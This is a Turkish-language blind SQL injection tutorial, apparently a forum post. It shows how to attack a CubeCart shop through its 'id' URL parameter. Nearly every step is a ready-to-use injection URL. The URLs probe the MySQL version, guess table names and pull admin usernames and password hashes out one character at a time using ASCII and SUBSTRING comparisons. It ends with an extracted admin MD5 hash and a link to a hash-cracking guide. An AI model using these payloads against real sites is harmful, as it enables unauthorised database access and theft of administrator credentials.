BLinD SQL Enjeksiyon Kısa bir Anlatım

1. Sürüm’ü sorgulayalım..
2. http://HEDEFSITE/index.php?id=5 and substring (@@version, 1,1) = 5- –
3. yaptık sayfa true (doğru) döndü. Eğer 4 yerine 5 yazsaydık versiyon 5 olmadığı için 404.php hatası verecekti.
4. He bu arada Myql Versiyonu 5 :
5. Yazdık sürüm 2. 1 …1 ekrana yansıdı.
6. Şimdi select yani seçme komutunu kabul edip etmediğine bakalım.
7. http://HEDEFSITE/index.php?id=5 and (select 1)=1– –
8. Sayfa yine true döndü sorun yok devam.
9. Not:Burda Blind SQL olup olmadığını öğrenmek içindir.
10. sub select Tablo_ismi bruteforce(yani tahmin) genelde olabilecek tablo isimleri deneyelim.
11. Örneğin; “admin” yazalım.
12. http://HEDEFSITE/index.php?id=5 and (select 1 from admin)=1– –
13. Eğer admin isminde tablo yoksa hata verecektir zaten var ise sayfa normal yüklenecektir.
14. Eğer ki sayfa olduğu gibi tekrardan gelir ise bu admin adlı bir tablo bulunduğunun işaretir.
15. Şimdi mesela biz bruteforce tarafından tabloyu tahmin olarak bulduk.
16. http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users)=1– –
17. yaptığımızda CubeCart_admin_users isimli bir sütun olduğundan dolayı problemsiz olarak sayfa true dönecektir.
18. Diyelim ki hata verdi.
19. Biz bunu bypass yöntemini kullanarak aşabiliriz.”limit” komutunu kullanarak aşalım.
20. http://HEDEFSITE/index.php?id=5 and (select 1 from CubeCart_admin_users limit 0,1)=1– –
21. Böyle yazdık hata verdi.
22. Şimdi ise bir de ” limit 1,1)=1– ” komutuyla deniyelim..
23. http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
24. Yazdık sayfa düzeldi.Şimdi CubeCart_admin_users tablosuna ait sütunları(kolon) test edelim;
25. http://HEDEFSITE/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –
26. Yazdık sayfa true döndü. Diğer columnuda password olarak buldum.
27. Devam edelim şimdi “username” ve “password” u birleştirip 1.harf 2.harf 3.harf … diye giderek verileri çekmeye başlayalım.
28. Verileri birleştirme ve harf1’den başlama;
29. biz onun parametreye verecek olursa olsun ASCII değeri dönecektir burada hangi ASCII fonksiyonunu kullanacağız
30. http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))>1– –
31. Komutumuz bu burada tablo ve column bilgilerini yazıcaz.
32. Bu 97 kısmı ne derseniz?
33. Ascii karakterleridir, harflerin sayı karşılığıdır.
34. Burada ASCII tablosu için bakabilirsiniz.
35. asciitable.com/
36. a = 97
37. ve benzeri
38. A = 65
39. bu tablodan görebilirsiniz
40. http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))=112– –
41. Yazdık hata vermedi,bizim asıl amacımız hata verdirmek.
42. Şimdi bir sonraki değeri deniyelim.
43. http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),2,1))=111– –
44. hata vermedi devam edelim..
45. http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),10,1))>96– –
46. Yine hata yok.
47. http://HEDEFSITE/index.php?id=5 and ASCII(SUBSTRING((select password from CubeCart_admin_users limit 0,1),21,1))>52– –
48. Yazdık sayfa hata verdi, ve karşımızda kullanıcı adı ve hash’ı
49. kullanıcı adı: HEDEFSITE
50. admin şifre: 9f66bf57850fbae64d515ffcb8ca6166
51. Bu kadar, Kolay gelsin..
52. MD5 Kırma Konusuna burdan devam ediniz - Yine kendi anlatımım. Hayırlı Kullanımlar
53. cyberizm.org/cyberizm-md5-sifre-kirmayla-alakali-hersey-videolu-resimli-anlatim.html